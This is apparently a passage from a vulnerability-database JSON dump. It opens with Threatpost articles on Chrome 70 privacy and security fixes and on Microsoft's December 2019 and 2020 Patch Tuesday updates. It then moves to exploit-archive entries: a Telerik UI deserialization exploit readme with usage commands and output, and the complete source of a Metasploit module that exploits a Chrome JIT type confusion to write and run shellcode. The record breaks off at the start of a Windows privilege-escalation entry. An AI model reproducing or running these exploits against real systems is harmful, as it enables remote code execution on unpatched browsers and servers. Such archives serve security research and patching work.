\u201cFor users that disable this feature, signing into a Google website will not sign them into Chrome.\u201d\n\n## Fixed Vulnerabilities\n\nIn addition to new privacy features, Chrome 70 also [packs](<https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html>) 23 security fixes, including both \u201chigh\u201d and \u201cmedium\u201d priority bugs; as well as new security features.\n\nOf note are patches for a high-priority sandbox escape vulnerability (CVE-2018-17462) in AppCache; a high-priority remote code-execution flaw (CVE-2018-17463) in V8; a \u201chigh\u201d priority URL spoof bug (CVE-2018-17464) in Omnibox; and a \u201chigh\u201d memory corruption glitch (CVE-2018-17466) in Angle.\n\nOther bugs include a high-priority use-after-free flaw (CVE-2018-17465) in V8, and a high-priority heap buffer overflow vulnerability in Little CMS in PDFium (no CVE assigned yet).\n\nA full list of the security bugs and fixes is [here](<https://chromium.googlesource.com/chromium/src/+log/69.0.3497.100..70.0.3538.67?pretty=fuller&n=10000>).\n\nChrome 70 also features Web Bluetooth, which is also available in Windows 10, which allows sites to communicate with user-selected Bluetooth devices in a \u201csecure and privacy-preserving\u201d way.\n\nAnd finally, Google released support for public key credentials in Chrome 70, which enables strong authentication to websites with public key cryptography, enabling password-less authentication and/or secure second-factor authentication without SMS texts.\n\n\u201cI\u2019m pretty excited about it because it allows sites to use my fingerprint for two-factor authentication,\u201d Pete LePage, developer advocate, said in a Tuesday [post](<https://developers.google.com/web/updates/2018/10/nic70>). 
\u201cBut, it also adds support for additional types of security keys and better security on the web.\u201d\n", "modified": "2018-10-17T14:04:48", "published": "2018-10-17T14:04:48", "id": "THREATPOST:2EA02E029D18D4A6E2F53BF8057CCD57", "href": "https://threatpost.com/on-heels-of-criticism-newly-released-google-chrome-70-prioritizes-privacy/138368/", "type": "threatpost", "title": "On Heels of Criticism, Newly-Released Google Chrome 70 Prioritizes Privacy", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T20:30:01", "bulletinFamily": "info", "cvelist": ["CVE-2020-16875", "CVE-2020-17095", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17121", "CVE-2020-17131", "CVE-2020-17132", "CVE-2020-17142", "CVE-2020-17152", "CVE-2020-17158"], "description": "Microsoft has addressed 58 CVEs (nine of them critical) for its December 2020 Patch Tuesday update. This brings the computing giant\u2019s patch tally to 1,250 for the year \u2013 well beyond 2019\u2019s 840.\n\nThis month\u2019s security bugs affect Microsoft Windows, Edge (EdgeHTML-based), ChakraCore, Microsoft Office and Office Services and Web Apps, Exchange Server, Azure DevOps, Microsoft Dynamics, Visual Studio, Azure SDK and Azure Sphere, according to the update. None are listed as publicly known or under active attack. Also, no vulnerability was assigned a CVSSv3 severity score of 9.0 or higher.\n\n## **Critical Bug Breakdown**\n\nThree of the critical flaws are found in Microsoft Exchange (CVE-2020-17117, CVE-2020-17132 and CVE-2020-17142), all allowing remote code execution (RCE). 
[One of these](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) occurs due to improper validation of cmdlet arguments, according to Microsoft, which doesn\u2019t provide an attack scenario but does note that the attacker needs to be authenticated with privileges.\n\n\u201cThis indicates that if you take over someone\u2019s mailbox, you can take over the entire Exchange server,\u201d according to Dustin Childs at Trend Micro\u2019s Zero Day Initiative (ZDI), writing in a [Tuesday analysis](<https://www.zerodayinitiative.com/blog/2020/12/8/the-december-2020-security-update-review>). \u201cWith all of the other Exchange bugs, definitely prioritize your Exchange test and deployment.\u201d\n\nAlso on the Exchange front, [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) addresses a patch bypass for CVE-2020-16875, which was reported and patched in September\u2019s Patch Tuesday release. While not critical, it\u2019s of note, Childs said.\n\nChilds also flagged [CVE-2020-17121](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17121>), one of two critical RCE bugs in Microsoft SharePoint (the other is [CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>)). Originally reported through the ZDI program, the bug could allow an authenticated user to execute arbitrary .NET code on an affected server in the context of the SharePoint Web Application service account.\n\n\u201cIn its default configuration, authenticated SharePoint users are able to create sites that provide all of the necessary permissions that are prerequisites for launching an attack,\u201d Childs explained. \u201cSimilar bugs [patched earlier this year](<https://threatpost.com/microsofts-patch-tuesday-critical-rce-bugs/159044/>) received quite a bit of attention. 
We suspect this one will, too.\u201d\n\nIn fact, the Sharepoint CVEs should take patching priority, Immersive Labs\u2019 Kevin Breen, director of cyberthreat research, said via email. \u201cBoth are rated as critical as they have RCE, and Sharepoint can be used like a watering hole inside large organizations by an attacker,\u201d he said. \u201cAll it takes is for a few weaponized documents to be placed for malicious code to spread across an organization.\u201d\n\nAnother critical bug of note is tracked as [CVE-2020-17095](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17095>), a Hyper-V RCE vulnerability that allows an attacker to escalate privileges from code execution in a Hyper-V guest to code execution on the Hyper-V host by passing invalid vSMB packet data. The flaw carries the highest CVSS score in the update, coming in at 8.5, since no special permissions are needed to exploit it.\n\n\u201cTo exploit this vulnerability, an adversary could run a custom application on a Hyper-V guest that would cause the Hyper-V host operating system to allow arbitrary code execution when it fails to properly validate vSMB packet data,\u201d explained Automox researcher Jay Goodman, via email. \u201cThe vulnerability is present on most builds of Windows 10 and Windows Server 2004 and forward.\u201d\n\nTwo post-authentication RCE flaws in Microsoft Dynamics 365 for Finance and Operations (on-premises) ([CVE-2020-17158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17158>) and [CVE-2020-17152](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17152>)) round out the critical patches, along with a memory-corruption issue in the Chakra Scripting Engine, which impacts the Edge browser ([CVE-2020-17131](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17131>)).\n\n\u201cOnly one [of the critical-rated updates] (surprisingly) impacts the browser,\u201d Childs said. 
\u201cThat patch corrects a bug within the JIT compiler. By performing actions in JavaScript, an attacker can trigger a memory-corruption condition, which leads to code execution. The lack of browser updates could also be a conscious decision by Microsoft to ensure a bad patch for a browser does not disrupt online shopping during the holiday season.\u201d\n\nThough it\u2019s a lighter than usual month for the volume of patches, the steady flow of critical RCE bugs presents a great deal of risk, said Justin Knapp, researcher at Automox, via email.\n\n\u201cInstead of having to manipulate a user to click a malicious link or attachment, bad actors merely have to target an unpatched system to gain initial access, at which point a number of methods can be employed to increase access to valuable assets,\u201d he said, referring to this month\u2019s critical RCE problems. \u201cIt goes without saying that the speed at which an organization can deploy these fixes will dictate the level of risk they take on.\u201d\n\n## **Other Bugs, Patching**\n\nIn addition to the critical bugs, a full 46 of the bugs are rated as important, and three are rated moderate in severity. The important bugs include 10 Office bugs impacting Outlook, PowerPoint and Excel \u2014 for these, Office 2019 versions for Mac do not have patches yet.\n\n\u201cThis is a book-end to a year that began with Microsoft addressing 49 CVEs in January of 2020, followed by eight consecutive months with over 90 CVEs addressed. In 2020, Microsoft released patches for over 1,200 CVEs,\u201d Satnam Narang, principal research engineer, Tenable, told Threatpost.\n\nPatching may be more difficult than ever going forward. \u201cOne of the things that stands out is that Microsoft has removed a lot of the detail they usually share with such advisories,\u201d Breen said. \u201cFor me, this could lead to some issues. 
Patching is not as easy as just clicking an update button and security teams like to gain a deeper understanding of what they are doing. Instead, however, they are expected to operate with less information.\u201d\n\nElsewhere, [Adobe issued patches](<https://threatpost.com/adobe-windows-macos-critical-severity-flaws/162007/>) for flaws tied to one important-rated and three critical-severity CVEs, during its regularly scheduled December security updates.\n\n\u201cWhile lighter than usual, the most severe allow for arbitrary code execution including three critical severity CVEs and one less severe (important-rated) flaw identified,\u201d Nick Colyer, researcher from Automox said. \u201cThe holidays present unique challenges to security teams\u2019 upcoming out-of-office time and the severity of the vulnerabilities Adobe has addressed are non-trivial against those challenges. It is important to prioritize any major vulnerabilities during holidays to reduce the threat surface exposed to would-be attackers.\u201d\n", "modified": "2020-12-08T20:23:30", "published": "2020-12-08T20:23:30", "id": "THREATPOST:02914A68EEB34D94544D5D00BF463BAC", "href": "https://threatpost.com/microsoft-patch-tuesday-holidays/162041/", "type": "threatpost", "title": "Microsoft Wraps Up a Lighter Patch Tuesday for the Holidays", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:40:13", "bulletinFamily": "info", "cvelist": ["CVE-2019-0859", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1352", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1471"], "description": "Microsoft has issued fixes for 36 CVEs for December 2019 Patch Tuesday across a range of products, with seven of them rated critical in severity \u2013 and one that\u2019s already being exploited in the wild as a zero-day bug.\n\nThe computing giant\u2019s [scheduled security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2019-Dec>) this month is relatively light, and includes patches for Microsoft Windows, Internet Explorer, Microsoft Office and related apps, SQL Server, Visual Studio and Skype for Business. 
In all, December Patch Tuesday addressed seven bugs that are rated critical, 28 that are rated important, and one that is rated moderate in severity.\n\n## Zero-Day Bug Exploited in the Wild\n\n[CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&epi=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00>) is an elevation-of-privilege vulnerability in Win32k, which has a live zero-day exploit circulating in the wild. The exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said.\n\n\u201cAn attacker could exploit the flaw to execute arbitrary code in kernel mode on the victim\u2019s system,\u201d said Satnam Narang, senior research engineer at Tenable, via email. \u201cFrom there, the attacker could perform a variety of actions, such as creating a new account with full user rights, installing programs, and viewing, changing or deleting data.\u201d\n\nThe one caveat is that to exploit the flaw, an attacker would need to have previously compromised the system using another vulnerability \u2013 thus, it\u2019s rated only as important in severity and carries a CVSSv3 base score of 7.8 out of 10. However, since it has been exploited in the wild as a zero-day, IT security staff should prioritize the patch, researchers said.\n\n\u201cThis is one of many vulnerabilities that Microsoft resolved in 2019 that were being exploited but were not rated as a critical severity,\u201d said Chris Goettl, director of product management, Security, at Ivanti, via email. 
\u201cIf your vulnerability-management criteria use vendor severity or CVSS score as criteria for determining what should be updated, you should re-evaluate your criteria to ensure exploited vulnerabilities like this do not slip past your prioritization process.\u201d\n\nThe zero-day was found by Kaspersky researchers as a result of a separate zero-day exploit for Google Chrome that was seen in November, being used to execute arbitrary code on a victim\u2019s machine. The newly discovered Windows EoP was embedded into a previously discovered Google Chrome exploit, the firm said: \u201cIt was used to gain higher privileges in the infected machine as well as to escape the Chrome process sandbox \u2013 a component built to protect the browser and the victim\u2019s computer from malicious attacks.\u201d\n\nThe exploits are being used by a threat group called \u201cWizardOpium.\u201d\n\nMicrosoft has addressed the vulnerability by correcting how Win32k handles objects in memory. The flaw is also similar to the CVE-2019-0859 bug reported in April, for which an exploit was developed and found being sold on [underground markets](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>).\n\n## Critical Bugs\n\nIn terms of the critical bugs included in this month\u2019s Patch Tuesday, a critical remote code-execution (RCE) vulnerability in Win32k Graphics ([CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ&epi=je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsnx6wdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-mFIAATdHZaWiphGfgHHVaQ\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsnx6wdqz2h00>)) would allow an adversary to create a new account with full user rights, install programs, and view, change or delete data. 
It exists due to the Windows font library improperly handling specially crafted embedded fonts. Attack vectors would be via a malicious document, or by luring users to a specially crafted website containing the exploit code.\n\n\u201cTo exploit the vulnerability, an attacker would need to run a specially crafted application on the guest operating system, resulting in execution of arbitrary code on the host operating system,\u201d said Narang.\n\nAlso on the RCE front, critical-rated [CVE-2019-1471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1471>) in Windows Hyper-V exists due to improper validation of inputs from an authenticated user on the guest operating system by the host server.\n\n\u201cThis critical-rated patch fixes a bug in Hyper-V that would allow a user on a guest OS to execute arbitrary code on the underlying host OS,\u201d explained Dustin Childs, researcher with Trend Micro\u2019s Zero-Day Initiative. \u201cBugs like this have been demonstrated at Pwn2Own in the past, and they\u2019re always fun to watch. 
Considering how much modern computing depends on virtualization, it\u2019s likely we\u2019ll continue to see research that focuses on exploiting the hypervisor from a guest OS.\u201d\n\nMicrosoft also announced five critical vulnerabilities for Microsoft\u2019s Git for Visual Studio 2017 and 2019 (CVE-2019-1349, CVE-2019-1350, CVE-2019-1352, CVE-2019-1354, CVE-2019-1387).\n\nThe description for all of them [is identical:](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1349>) an RCE bug that exists when Git for Visual Studio client improperly sanitizes input (sanitization is the process of modifying input to ensure that it is actually valid).\n\n\u201cAs Visual Studio is one of the most popular development environments used today to design and build applications, this exploit puts engineering organizations on the front lines of a potential attack,\u201d explained Richard Melick, senior technology product manager at Automox, via email. \u201cIf left unpatched, engineering and development groups would be at risk to being the point of entry for malware deployment, lateral movement through the network, rogue account creation, and theft of proprietary application code.\u201d\n\nIn order to exploit any of these Visual Studio vulnerabilities, an attacker would need to use the Git client to download a malicious repository to the victim\u2019s endpoint.\n\n\u201cWhile not common, it is still possible using fairly simple techniques,\u201d Melick said. \u201cBy running intelligence gathering in channels like LinkedIn and job listings, an attacker could learn about an organization\u2019s use of Visual Studio and the details of the open-source projects in play. From there, entry into the network could come through a common phishing email technique to the engineering for help troubleshooting a compatibility issue with their open-source software, providing a link to the Git repository, or even for an interview as an example of previous work. 
The engineering team would then download the malicious repo, allowing the malicious code to execute, giving attacker access.\u201d\n\n## Additional Notes\n\nOne other bug that stood out to researchers in the update is [CVE-2019-1469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1469>), an important-rated Win32k information disclosure vulnerability that exists when a Win32k component improperly provides kernel information.\n\n\u201cA successful attack through this vulnerability could result in private data being revealed to an attacker, providing necessary information to further compromise the victim\u2019s system,\u201d Melick said. \u201cA successful attack relies on access to the machine to load a specially crafted application.\u201d\n\nAnd finally, it\u2019s also worth mentioning that there is only one Patch Tuesday left (in January) until Windows 7 and Server 2008\\2008 R2 reach end-of-life and Microsoft stops issuing security fixes for them.\n\n\u201cThere is no doubt we are going to see a similar situation to the Windows XP end-of-service with a large number of these machines still in use and not updated,\u201d Melick said. \u201cIt is safe to assume that many of these machines in this bucket are falling under unmanaged or mission-critical categories with no clear path to update.\u201d\n\nAlso on Patch Tuesday, [Adobe issued 17 critical vulnerabilities](<https://threatpost.com/adobe-fixes-critical-acrobat-photoshop-brackets-flaws/150970/>) in Acrobat Reader, Photoshop and Brackets, which could lead to arbitrary code execution if exploited.\n", "modified": "2019-12-10T21:21:24", "published": "2019-12-10T21:21:24", "id": "THREATPOST:7E0D83AD71F0D13E7AF6CC3E38AC5F6F", "href": "https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/", "type": "threatpost", "title": "Microsoft Zaps Actively Exploited Zero-Day Bug", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-19T01:04:29", "description": "Exploit for asp platform in category web applications", "edition": 1, "published": "2019-12-18T00:00:00", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "1337DAY-ID-33683", "href": "https://0day.today/exploit/description/33683", "sourceData": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit\r\n\r\nSee the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. 
PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. 
@bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip\n\n# 0day.today [2019-12-18] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33683"}, {"lastseen": "2020-03-06T15:10:14", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2020-03-06T00:00:00", "title": "Google Chrome 67 / 68 / 69 Object.create Type Confusion Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17463"], "modified": "2020-03-06T00:00:00", "id": "1337DAY-ID-34054", "href": "https://0day.today/exploit/description/34054", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\r\n 'Description' => %q{\r\n This modules exploits a type confusion in Google Chromes JIT compiler.\r\n The Object.create operation can be used to cause a type confusion between a\r\n PropertyArray and a NameDictionary.\r\n The payload is executed within the rwx region of the sandboxed renderer\r\n process, so the browser must be run with the --no-sandbox option for the\r\n payload to work.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'saelo', # discovery and exploit\r\n 'timwr', # metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-17463'],\r\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\r\n ['URL', 
'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\r\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\r\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\r\n ],\r\n 'Arch' => [ ARCH_X64 ],\r\n 'Platform' => ['windows', 'osx'],\r\n 'DefaultTarget' => 0,\r\n 'Targets' => [ [ 'Automatic', { } ] ],\r\n 'DisclosureDate' => 'Sep 25 2018'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n\r\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\r\n print_status(\"[*] \" + request.body)\r\n send_response(cli, '')\r\n return\r\n end\r\n\r\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\r\n\r\n jscript = %Q^\r\nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);\r\n\r\nlet ab = new ArrayBuffer(8);\r\nlet floatView = new Float64Array(ab);\r\nlet uint64View = new BigUint64Array(ab);\r\nlet uint8View = new Uint8Array(ab);\r\n\r\nNumber.prototype.toBigInt = function toBigInt() {\r\n floatView[0] = this;\r\n return uint64View[0];\r\n};\r\n\r\nBigInt.prototype.toNumber = function toNumber() {\r\n uint64View[0] = this;\r\n return floatView[0];\r\n};\r\n\r\nfunction hex(n) {\r\n return '0x' + n.toString(16);\r\n};\r\n\r\nfunction fail(s) {\r\n print('FAIL ' + s);\r\n throw null;\r\n}\r\n\r\nconst NUM_PROPERTIES = 32;\r\nconst MAX_ITERATIONS = 100000;\r\n\r\nfunction gc() {\r\n for (let i = 0; i < 200; i++) {\r\n new ArrayBuffer(0x100000);\r\n }\r\n}\r\n\r\nfunction make(properties) {\r\n let o = {inline: 42} // TODO\r\n for (let i = 0; i < NUM_PROPERTIES; i++) {\r\n eval(`o.p${i} = properties[${i}];`);\r\n }\r\n return o;\r\n}\r\n\r\nfunction pwn() {\r\n function find_overlapping_properties() {\r\n let propertyNames = [];\r\n for (let i = 0; i < 
NUM_PROPERTIES; i++) {\r\n propertyNames[i] = `p${i}`;\r\n }\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\r\n return [${propertyNames.join(', ')}];\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n for (let i = 1; i < NUM_PROPERTIES; i++) {\r\n propertyValues[i] = -i;\r\n }\r\n\r\n for (let i = 0; i < MAX_ITERATIONS; i++) {\r\n let r = vuln(make(propertyValues));\r\n if (r[1] !== -1) {\r\n for (let i = 1; i < r.length; i++) {\r\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\r\n return [i, -r[i]];\r\n }\r\n }\r\n }\r\n }\r\n\r\n fail(\"Failed to find overlapping properties\");\r\n }\r\n\r\n function addrof(obj) {\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n return o.p${p1}.x1;\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\r\n propertyValues[p2] = {y1: obj};\r\n\r\n let i = 0;\r\n for (; i < MAX_ITERATIONS; i++) {\r\n let res = vuln(make(propertyValues));\r\n if (res !== 13.37)\r\n return res.toBigInt()\r\n }\r\n\r\n fail(\"Addrof failed\");\r\n }\r\n\r\n function corrupt_arraybuffer(victim, newValue) {\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n let orig = o.p${p1}.x2;\r\n o.p${p1}.x2 = ${newValue.toNumber()};\r\n return orig;\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n let o = {x1: 13.37, x2: 13.38};\r\n propertyValues[p1] = o;\r\n propertyValues[p2] = victim;\r\n\r\n for (let i = 0; i < MAX_ITERATIONS; i++) {\r\n o.x2 = 13.38;\r\n let r = vuln(make(propertyValues));\r\n if (r !== 13.38)\r\n return r.toBigInt();\r\n }\r\n\r\n fail(\"Corrupt ArrayBuffer failed\");\r\n }\r\n\r\n let [p1, p2] = find_overlapping_properties();\r\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\r\n\r\n let memview_buf = new ArrayBuffer(1024);\r\n let driver_buf = new ArrayBuffer(1024);\r\n\r\n 
gc();\r\n\r\n let memview_buf_addr = addrof(memview_buf);\r\n memview_buf_addr--;\r\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\r\n\r\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\r\n\r\n let driver = new BigUint64Array(driver_buf);\r\n let original_memview_buf_ptr = driver[4];\r\n\r\n let memory = {\r\n write(addr, bytes) {\r\n driver[4] = addr;\r\n let memview = new Uint8Array(memview_buf);\r\n memview.set(bytes);\r\n },\r\n read(addr, len) {\r\n driver[4] = addr;\r\n let memview = new Uint8Array(memview_buf);\r\n return memview.subarray(0, len);\r\n },\r\n readPtr(addr) {\r\n driver[4] = addr;\r\n let memview = new BigUint64Array(memview_buf);\r\n return memview[0];\r\n },\r\n writePtr(addr, ptr) {\r\n driver[4] = addr;\r\n let memview = new BigUint64Array(memview_buf);\r\n memview[0] = ptr;\r\n },\r\n addrof(obj) {\r\n memview_buf.leakMe = obj;\r\n let props = this.readPtr(memview_buf_addr + 8n);\r\n return this.readPtr(props + 15n) - 1n;\r\n },\r\n };\r\n\r\n // Generate a RWX region for the payload\r\n function get_wasm_instance() {\r\n var buffer = new Uint8Array([\r\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\r\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\r\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\r\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\r\n ]);\r\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\r\n }\r\n\r\n let wasm_instance = get_wasm_instance();\r\n let wasm_addr = memory.addrof(wasm_instance);\r\n print(\"wasm_addr @ \" + hex(wasm_addr));\r\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\r\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\r\n\r\n memory.write(wasm_rwx_addr, shellcode);\r\n\r\n let fake_vtab = new ArrayBuffer(0x80);\r\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\r\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\r\n\r\n 
let div = document.createElement('div');\r\n let div_addr = memory.addrof(div);\r\n print('div_addr @ ' + hex(div_addr));\r\n let el_addr = memory.readPtr(div_addr + 0x20n);\r\n print('el_addr @ ' + hex(div_addr));\r\n\r\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\r\n memory.writePtr(el_addr, fake_vtab_addr);\r\n\r\n print('Triggering...');\r\n\r\n // Trigger virtual call\r\n div.dispatchEvent(new Event('click'));\r\n\r\n // We are done here, repair the corrupted array buffers\r\n let addr = memory.addrof(driver_buf);\r\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\r\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\r\n}\r\n\r\npwn();\r\n^\r\n\r\n if datastore['DEBUG_EXPLOIT']\r\n debugjs = %Q^\r\nprint = function(arg) {\r\n var request = new XMLHttpRequest();\r\n request.open(\"POST\", \"/print\", false);\r\n request.send(\"\" + arg);\r\n};\r\n^\r\n jscript = \"#{debugjs}#{jscript}\"\r\n else\r\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\r\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<head>\r\n<script>\r\n#{jscript}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n^\r\n\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend\n\n# 0day.today [2020-03-06] #", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34054"}, {"lastseen": "2020-03-09T21:06:08", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2020-03-09T00:00:00", "title": "Microsoft Windows - (WizardOpium) Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-09T00:00:00", 